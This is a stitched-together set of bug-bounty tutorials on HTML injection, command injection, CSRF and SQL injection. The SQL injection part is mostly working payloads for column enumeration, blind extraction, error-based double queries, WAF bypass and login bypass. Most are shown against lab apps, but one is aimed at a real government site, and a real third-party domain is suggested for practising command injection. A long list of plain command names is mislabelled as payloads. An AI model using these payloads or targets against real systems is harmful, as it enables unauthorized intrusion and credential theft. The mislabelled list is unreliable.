Introduction: The OWASP (Open Web Application Security Project) Top 10 list outlines the most pressing security concerns for software dev...

Introduction:

The OWASP (Open Web Application Security Project) Top 10 list outlines the most pressing security concerns for software developers and organizations. These vulnerabilities represent the most significant threats to software security today. Let's explore each one in simple terms.

1. Injection

Injection flaws occur when attackers sneak malicious code into an application. This can lead to severe consequences like data breaches or even complete system compromise.

Example: Sending harmful data to a login form can trick the system into granting unauthorized access.




Welcome Hunters, So Today i'am going to show you how to hunt for HTML Injection in a Web Application. let's Continue, Wha...

How To Hunt For HTML Injection (HTMLi) Practical Demonstration

Welcome Hunters,

So Today i'am going to show you how to hunt for HTML Injection in a Web Application.
let's Continue,

What is HTML Injection?

So according to OWASP HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

In simple words HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page.

Impact Of HTML Injection

➤ It can allow attacker to modify the page.
➤ DOM can be load there.

Steps To Find HTML Injection

➤ Find an input Parameter either GET based or POST based.

➤ If your input Reflect back to you on web page there may be HTML i.

➤  Execute any HTML code, if you succeed to execute any HTML code there. Then there is HTMLi


How To Attack 

➤ You need to find some vulnerable columns on the target website. We can use burp-suite – spider the website find out the parameters on the target website.
How To Hunt For HTML Injection (HTMLi) Practical Demonstration


➤  input a word over there if its reflect back then thers a chance of HTMLi. Means that you have to find any input field and you have to try any word if your word refecting back to you so then there may be HTML Injection


➤ As we find out the vulnerable input here so we will try to inject HTMLi codes to effect the webpage.

➤ <h1> you have bin hacked by Geekyworld</h1>
➤ <h1></h1> -  are the headers of the body in HTML code or its use for managing the web interface
How To Hunt For HTML Injection (HTMLi) Practical Demonstration
How To Hunt For HTML Injection (HTMLi) Practical Demonstration 

➤ GET BASE Through URL cat=1 place 1 by hello

So it will reflect on the web page.We can try this to effect the web page.

➤ <h1> you have bin hacked by Cybersecbroo</h1>


➤ POST base – Through comment field

So we will try to inject the HTMLi code in the Name & Comment field if its reflect back the variables so we will try the SCRIPT So it will reflect on the web page.
We can try this to effect the web page.
➤ <h1> you have bin hacked by Cybersecbroo</h1>

How To Hunt For HTML Injection (HTMLi) Practical Demonstration
How To Hunt For HTML Injection (HTMLi) Practical Demonstration 

How To Hunt For HTML Injection (HTMLi) Practical Demonstration
How To Hunt For HTML Injection (HTMLi) Practical Demonstration 


So this was the practical demonstration of how to hunt for HTML Injection i hpoe you will enjoy this and it will help to hunt vulnerability more quickly.
If you find any error or mistake please let me know in the commant box as well as you can send me your query by contacts us section 
Thank you Happy Hunting,

Follow Us on
Facebook: Cybersec_broo
Instagram: Cybersec_broo

How To Hunt For Command Injection Step by Step (CI)? Welcome Hunter's Today we are going to talk about Command Injection (CI) ...

How To Hunt For Command Injection Step by Step (CI)?
How To Hunt For Command Injection Step by Step (CI)?
Welcome Hunter's

Today we are going to talk about Command Injection (CI) which is the critical vulnerability according to (OWASP TOP 10)


Background Concept of Command Injection:

Operating system command injection vulnerability arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell.
Meta characters to modify the command that is executed and inject arbitrary further commands that will be executed by the server.

Impact of Command Injection

By exploiting a command injection vulnerability an attacker can abuse the function to inject his own operating system commands.This means that he can easily take complete control over a web server.

Example of Command Injection 

➤ A common function exists that passes an ip address the user specifies to the system's ping command. Therefore if the user specifies 127.0.0.1 as an ip address, the command will look like this:
  ping -c5 127.0.0.1

➤ Since it is possible to break out of the ping command or provoke an eror with useful information the attacker can use this functionality to execute his own commands. An example for adding a second system command could look like this:
ping -c5 127.0.0.1; id

How To find Command Injection?

➤ Use Delimiter to Break or continue the execution of CMDs there

Delimiter List

; ^ &

➤ &&

➤ ||

➤ %0D

➤ %0A , \n

➤ <

Exploitation of Command Injection 

➤ Find a input field whose interacting with operating system shell.

➤ Try to execute and system shell commands with delimiter.

Examples
;ls

➤ &&ls

➤ ||ls 

Practice:

➤ DVWA And Multillidae

➤ Live Site: http://projects.knmi.nl

Note:  We can use burp suite for finding parameter flaw to execute Command injection in target website. Again, we will use spider for crawling the website, repeater to modify our codes, and Intruder to brute force attack to the target website.
Command injection is get based so try to find out the parameter with flaw with some value.

Automated tool for Command Injection


Commix is a python based tool to execute OS commands automatically


Command Injection Payloads

lftp
lftpget
link
ln
loadkeys
locale
locate
lockfile
logger
login
logname
logrotate
look
losetup
lpadmin
lpinfo
lpmove
lpq
lpr
lprm
lpstat
ls
lsattr
lsmod
lspci
lsusb
m4
mail
mailq
mailstats
mailto
make
makedbm
makemap
man
manpath
mattrib
mbadblocks
mcat
mcd
mcopy
md5sum
mdel, mdeltree
mdir
mdu
merge
mesg
metamail
metasend
mformat
mimencode
minfo
mkdir
mkdosfs
mke2fs
mkfifo
mkfs
mkfs.ext3
mkisofs
mklost+found
mkmanifest
mknod
mkraid
mkswap
mktemp
mlabel
mmd
mmount
mmove
modinfo
modprobe
more
mount
mountd
mpartition
mpg123
mpg321
mrd
mren
mshowfat
mt
mtools
mtoolstest
mtype
mv
mzip
named
namei
nameif
netstat
newaliases
newgrp
newusers
nfsd
nfsstat
nice
nm
nohup
nslookup
nsupdate
objcopy
objdump
od
openvt
passwd
paste
patch
pathchk
perl
pidof
ping
pinky
pmap
portmap
poweroff
pppd
pr
praliases
printenv
printf
ps
ptx
pwck
pwconv
pwd
python
quota
quotacheck
quotaoff
quotaon
quotastats
raidstart
ramsize
ranlib
rarpd
rcp
rdate
rdev
rdist
rdistd
readcd
readelf
readlink
reboot
reject
rename
renice
repquota
reset
resize2fs
restore
rev
rexec
rexecd
richtext
rlogin
rlogind
rm
rmail
rmdir
rmmod
rndc
rootflags
route
routed
rpcgen
rpcinfo
rpm
rsh
rshd
rsync
runlevel
rup
ruptime
rusers
rusersd
rwall
rwho
rwhod
sane-find-scanner
scanadf
scanimage
scp
screen
script
sdiff
sed
sendmail
sensors
seq
setfdprm
setkeycodes
setleds
setmetamode
setquota
setsid
setterm
sftp
sh
sha1sum
showkey
showmount
shred
shutdown
size
skill
slabtop
slattach
sleep
slocate
snice
sort
split
ssh
ssh-add
ssh-agent
sshd
ssh-keygen
ssh-keyscan
stat
statd
strace
strfile
strings
strip
stty
su
sudo
sum
swapoff
swapon
sync
sysctl
sysklogd
syslogd
tac
tail
tailf
talk
talkd
tar
taskset
tcpd
tcpdump
tcpslice
tee
telinit
telnet
telnetd
test
tftp
tftpd
time
tload
tmpwatch
top
touch
tr
tracepath
traceroute
troff
true
tset
tsort
tty
tune2fs
tunelp
ul
umount
uname
uncompress
unexpand
unicode_start
unicode_stop
uniq
uptime
useradd
userdel
usermod
users
usleep
uudecode
uuencode
uuidgen
vdir
vi
vidmode
vim
vmstat
volname
w
wall
warnquota
watch
wc
wget
whatis
whereis
which
who
whoami
whois
write
xargs
xinetd
yacc
yes
ypbind
ypcat
ypinit
ypmatch
yppasswd
yppasswdd
yppoll
yppush
ypserv
ypset
yptest
ypwhich
ypxfr
zcat
zcmp
zdiff
zdump
zforce
zgrep
zic
zless
zmore
znew
a
arp
assoc
at
atmadm
attrib
bootcfg
break
cacls
call
change
chcp
chdir
chkdsk
chkntfs
cipher
cls
cmd
cmstp
color
comp
compact
convert
copy
cprofile
cscript
date
defrag
del
dir
diskcomp
diskcopy
diskpart
doskey
driverquery
echo
endlocal
eventcreate
eventquery
eventtriggers
evntcmd
exit
expand
fc
filter
find
findstr
finger
flattemp
for
format
fsutil
ftp
ftype
getmac
goto
gpresult
gpupdate
graftabl
help
helpctr
hostname
if
ipconfig
ipseccmd
ipxroute
irftp
label
lodctr
logman
lpq
lpr
macfile
mkdir
mmc
mode
more
mountvol
move
msiexec
msinfo32
nbtstat
net
netsh
netstat
nslookup
ntbackup
ntcmdprompt
ntsd
openfiles
pagefileconfig
path
pathping
pause
pbadmin
pentnt
perfmon
ping
popd
print
prncnfg
prndrvr
prnjobs
prnmngr
prnport
prnqctl
prompt
pushd
query
rasdial
rcp
recover
reg
regsvr32
relog
rem
rename
replace
rexec
rmdir
route
rsh
rsm
runas
sc
schtasks
secedit
set
setlocal
shift
shutdown
sort
start
subst
systeminfo
sfc
taskkill
tasklist
tcmsetup
telnet
tftp
time
title
tracerpt
tracert
tree
type
typeperf
unlodctr
ver
verify
vol
vssadmin
w32tm
winnt
winnt32
wmic
xcopy


So this was the tutorial on Command Injection I hope it would be helpful for you guys to hunt bugs more quickly.
If you have any query you can put in the comment box. If you find any error or mistake please let me know either you can put in the comment section or Email: rajeshsahan507@gmail.com
Thank you happy hunting.


Follow us on 

Facebook: Cybersec_broo
Instagram: Cybersec_broo

How To Hunt For Cross Site Request Forgery Welcome Hunters, ➤ Cross Site request forgery (CSRF) is an attack that forces an end us...

How To Hunt For Cross Site Request Forgery?
How To Hunt For Cross Site Request Forgery
Welcome Hunters,

➤ Cross Site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on web application in which they’re currently authenticated.
➤ CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.
➤ With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.
➤ If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth.
 If the victim is an administrative account, CSRF can compromise the entire web application.

Why Does a CSRF Attack Work?

CSRF attacks works because the website never verifies whether the request came from a legitimate user: instead it just verifies that the request came form the browser of the authorized user.

How CSRF Attack works

Steps
➤ A user is authenticated on a website say hackerone.com
➤ The attacker tricks the victim into visiting his controlled domain say attacker.com
The attacker.com contains the malicious code which actually sends a request to hackerone.com to perform a specific action say changing victim website language.
➤ Hackerone.com assumes that request was sent from the victim's browser and does not verify it and hence changes the victim's lamguage
Note: So, in CRSF we will create a fake page of the victim website.
Because most off the form are based on POST base so we will try to make a forum.
Tool: Burp Suite
We will create a fake page and try to send it to the victim so if the victim response to that server there might a chance of the input credentials of the target.

Injection point for CSRF – Cross site request forgery


 CSRF can be GET based

 The function will call through the URL.



If you send this one to your victim and if he click on this link we can generate a malicious page with the tag on it.

Get Base CSRF on Logout.

In this case we will sent a link to the victim *logout.php* If the victim click on that link so the victim session will logout because we have sent him the link of *logout.php* of the same server.

  

CSRF can be POST based 

The function will call through the POST form example: A fake login forum or a fake page.

Get Based  CSRF Example

Let's assume that the website geekyworld.in utilizes a GET request to change the password. The request looks like the following
http://geekyworld.in/password.php?newpass=geeky@&confpass=world
The attacker can now modify the new pass and confpass parameters with his own password and forces the victim's browser to perform a GET request and hence the password would be changed to what the attacker set up. The code for forcing the victim's  browser to make a get request would look something like this:
<img src="http://geekyworld.in/password.php?newpass=geeky&confpass=world" width="100" height="100">

Note: I hope you guys have the knowledge of HTML because i am not going to explain it if not you have to learn it if you wanna be a Bug Bounty Hunter 

CSRF Protection Technique 

➤ Referrer-Based Checking
➤ Anti-CSRF Tokens
➤ Brute Forcing Weak Anti CSRF Token Algorithm
➤ Tokens Not Validated Upon server
➤ Analyzing Weak Anti CSRF Tokens Strength
--------------------------------------------------------------------------------------------------------------------------

So i hope this would be helpful for you to hunt vulnerability more quickly. if you find any mistake please let me know in the comment box or here rajeshsahan507@gmail.com
Thank you and happy Hunting keep shining 

Follow us on 
facebook: @Cybersec_broo
Instagram: @Cybersec_broo
To get regular updates of Ethical hacking stuffs

How to Hunt For SQL Injection learn Practically with background Concept Welcome Hunters,  SQL (Structured Query Language) injection ...

How to Hunt For SQL Injection learn Practical with background Concept
How to Hunt For SQL Injection learn Practically with background Concept

Welcome Hunters,

 SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible

Backgroung Concept About SQL Injection

* How SQL Injection works

➤ In order to run malicious SQl queries against a database server an attacker must first find an input within the web application that is included inside of an SQL query

➤ In order for an SQL Injection attack to take place the vulnerable website needs to directly include user input within an SQl statement. An attacker can then insert a payload that will be included as part of the SQL query and run against the database server.

Note:  All the process works in background in SQLI we try to retrieve data from the backend to gain credentials related to the target website.

Injection point For SQL Injection

 ➤ SQL Injection can be GET Based
 ➤ SQL Injection can be POST Based
 ➤ SQL Injection can be Header Based
 ➤ SQL Injection can be  Cookie Based

Note: To execute your SQLI queries you have to find some input forum to execute the commands.

SQL Injection GET based
The attacker has to attack through the URLS parameters to execute the commands.
Example- www.any.com/filename.programmning?parameter=value

SQL Injection POST based
Attacker have to find any html forum that may execute sqli query.
Example: Signup form, login form, etc.

SQL Injection HEADER based
In the process we have to execute the SQLI commands through the headers parameters in the target website as we have to look for – 
Example: Referrer | User-Agent | Location | Host.

SQL Injection Cookie Based
In this process we have to execute the command through with the COOKIE Parameters to accomplish our target. (We have to find the cookies from the web browser)
for this just visit on the any website and try to intercept request through Burp Suite and put backslash in the end of the cookie if you find any error in the response related to SQL the there may be SQL Injection.

Note: You can use single quote (') as well as double quote (") to break the sql statement
Example: Cookie: username:sdh@#$;

Now i hope you have an basic idea about what is SQl injection and how many types of SQL Injection are there.
And how to find SQl Injection Now we will see how to fix the query of sql statement because query fixing is the second step of SQL injection after find out the injection point.

Lets Continue,

Learn SQL Injection query Fixing

➤ Identify SQL Injection vulnerability

'
"
\

')

")


➤ Balance the query

http://192.168.1.103/sqli-labs-master/Less-1/?id=1 {front end}
select id ='id' where name ='xyz' {background}


How to fix

Basically you need to just put the -- + at the end of the vulnerable parameter after single quote or double quote to balance the query (that is used in the MySQl as a comment)

http://192.168.1.103/sqli-labs-master/Less-1/?id=1'   --  

select id ='1'    --  ' where name ='xyz' {background}

In Background

select id=1  --  where name =xyz

how to fix query

http://192.168.1.103/sqli-labs-master/Less-2/?id=1   --  

Find total no of vulnerable columns

Order by 1{same page }

Order by 2 {same page }


Order by n {different page }

There is n-1 columns are Present

http://192.168.1.103/sqli-labs-master/Less-1/?id=1' order by 1  --   

Note:

 ➤ Order By: This is a keyword used in mysql to display the result of sorted columns
In a similar manners we can use "Group By" keyword to determine the number of columns in case the Order By keyword does not works or it is blacklisted by WAF (Web Application Firewall).

Find exact no of vulnerable columns out of these n-1

 union all select 1,2,...n-1

Example:

union all select 1,2,3

select id=-1' union all select 1,2,3  --  where name =xyz


executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,2,3 --  

 Execute any database sqli query there 

On that reflected Number

Example: Database()

version()

user()

Executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),3 --  

http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),user() --  

--------------------------------------------------------------------------------------------------------------------------------------------

Situation you are getting error but you are not getting output of union sqli statement in that case there may error based sqli or may be double query based sql injection.

http://192.168.1.103/sqli-labs-master/Less-5/?id=-1'  --  


error/double based sqli query -> hackbar->error/double->get database

--------------------------------------------------------------------------------------------------------------------------

Blind SQL Injection

Blind Boolean Based SQL Injection

and 1=1 {true }

and 1=2 {false }

and "a"="b"

and database()="xyz"

We can not assume the database

and sub string(database(),1,1)="a"

http://192.168.1.103/sqli-labs-master/Less-8/?id=1'    and substring(database(),1,1)="s"  --   {true vale that means first character of first database is s}


http://192.168.1.103/sqli-labs-master/Less-8/?id=1'    and substring(database(),2,1)="e"  --   {true second character of first database is e}

Blind Time Based SQL Injection

 ' and sleep(10) --  
" and sleep(10) --  

') and sleep(10) --  

how to extract database for blind time based sqli

' and sleep(10) and 1=1 --  

i gave http://192.168.1.103/sqli-labs-master/Less-9/?id=1'   and sleep(10) and database()="security" --   its sleeping that’s means

http://192.168.1.103/sqli-labs-master/Less-9/?id=1'   and sleep(10) and database()="xyz" --   
(Its not sleeping for 10 sec)

Exploitation of GET Based sqli

1. Database List -

hackbar->union->database->group_concat

information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195

2.Find tables of a database -dvwa

hackbar->union->tables->group_concat

guestbook
users

3. Find columns of a table - guestbook

comment_id
comment
name


4. Data of that columns

name,comment

hackbar->union->data->group_concat

name,"<------>",comment,"---->",third


Error Based Double Query Exploitaion

What about other Database for if want to fetch remaining database you have to increase first value of first limit

LIMIT  1,1 - challenges

LIMIT  2,1 - dvwa

LIMIT 3,1 - metasploit

tables

Default Tables

LIMIT  0,1 -  guestbook

LIMIT  1,1 - users


LIMIT  2,1 -- you are not getting anything that means there is only two tables


columns for double query based

LIMIT  0,1   - user_id

LIMIT  1,1.   ---  first name

LIMIT  2,1)). --- last_name

LIMIT  3,1)). ---- user

LIMIT  4,1)).  --- password

LIMIT  5,1)). -- avatar

LIMIT  0,1)). ---- nothing

Data of these columns
user        password
admin 5f4dcc3b5aa765d61d8327deb882cf99
Gordon e99a18c428cb38d5f260853678922e03
1337 8d3533d75ae2c3966d7e0d4fcc69216b
Pablo

Post Based SQLI

Balance the query

' --  

Problem is not working with post based instead of  + use space (  ) or you can also use # to fix (#) is also used for comment out part of sqli query. 
-- or # 

Find total no of vulnerable columns

order by 1

find exact no of vulnerable columns

'  union all select 1,2  #

Execute database query

'  union all select database(),user()  #

Less -12

") union all select 1,2 #

") union all select database(),user() #


Blind boolean post based SQL Injection


'  OR 1=1  #

" OR 1=1 #

') OR 1=1 #

") OR 1=1 #


'  OR database()="security"  #

'  OR sub string(database(),1,1)="a"  #

'  OR sub string(database(),1,1)="s"  #
First character of database is s

'  OR substring(database(),2,1)="e"  #

Second character of database is e 


Blind time based

' OR sleep(10) #
" OR sleep(10) #
') OR sleep(10) #
") OR sleep(10) # {worked}

") OR sleep(10) and 1=1  #

") OR sleep(10) and substring(database(),3,1)="a"  #

application is sleeping when we fired this

") OR sleep(10) and substring(database(),3,1)="c"  #

That means third character of database is c 



Exploitation of POST Based SQLI


inject database query

1. Database list

hackbar -> union -> database-> group_concat

' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #

information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195


2. Find table of a database - security

' union all select (SELECT  GROUP_CONCAT(table_name  SEPARATOR  0x3c62723e)  FROM  INFORMATION_SCHEMA.TABLES  WHERE  TABLE_SCHEMA=0x7365637572697479),2 #

E-Mails

referrersuser-agents
users

3. Find columns of a table - users

hackbar->union->columns->group_concat

' union all select (SELECT  GROUP_CONCAT(column_name  SEPARATOR  0x3c62723e)  FROM  INFORMATION_SCHEMA.COLUMNS  WHERE  TABLE_NAME=0x7573657273),2 #


user_id
first_name
last_name
user
password
avatar
id
username
password

4. Data of these columns - user, password

user,"<----->“, password
' union all select 1,(SELECT  GROUP_CONCAT(username,"<----->",password  SEPARATOR  0x3c62723e)  FROM  security.users) #



Error Based Double Query Exploitation Post Method

')   AND(SELECT  1  from(SELECT  COUNT(*),CONCAT((SELECT  (SELECT  (SELECT  DISTINCT  CONCAT(0x7e,0x27,CAST(schema_name  AS  CHAR),0x27,0x7e)  FROM  INFORMATION_SCHEMA.SCHEMATA  WHERE  table_schema!=DATABASE()  LIMIT  3,1))  FROM  INFORMATION_SCHEMA.TABLES  LIMIT  0,1),  FLOOR(RAND(0)*2))x  FROM  INFORMATION_SCHEMA.TABLES  GROUP  BY  x)a)  AND  1=1 #


Cookie Based SQLI

target - testphp.vulnweb.com

Balance Query

'  --


' and 'x'='x

select login='test/test'  and 'x'='x   ' where something other part of query


-------------------------------------------
Header Based sqli

Balance Query

' --

' and 'a'='a



select referrer='value ' OR SLEEP(5) and 'a'='a ' something other part of query


-------------------------------------------

WAF-Web application firewall by passing

Earlier i tried

' order by 1 --+


When I tried

' union all select 1,2,3,4,5,6,7 --+

I got not acceptable error

Either union may be illegal keyword may be all will be illegal input select

illegal word (word)= /*!12345word*/

' /*!12345union*/ all select 1,2,3 --+

http://multan.gov.pk/page.php?data=-2' /*!12345union*/ all select 1,2,database(),4,5,6,7 --+

Now exploit this
all database list

hackbar->union->database->group_concat
on any reflect no

(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)



' /*!12345union*/ all select 1,2,(SELECT+/*!12345GROUP_CONCAT*/(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4,5,6,7 --+

Authentication Bypassing through SQLI


Let’s assume background of login page

select username ='value1'&password='value2' where some other part of query

value1 = '   OR 1=1 --

select username =''   OR 1=1 -- '&password='value2' where some other part of query


value1= 1' OR '1'='1

select username ='1' OR '1'='1 '&password='value2' where some other part of query 

So guys this was all about SQl Injection which the most critical vulnerability in these days in the web applications.
I hope this would be helpful for you guys to hunt more quickly if you find any grammar error please let me know in the comment box as well as you can send it on the mail attached in the author section.
Thank you happy Hunting

Resource from Hunter 1.0: Vikash Chaudhary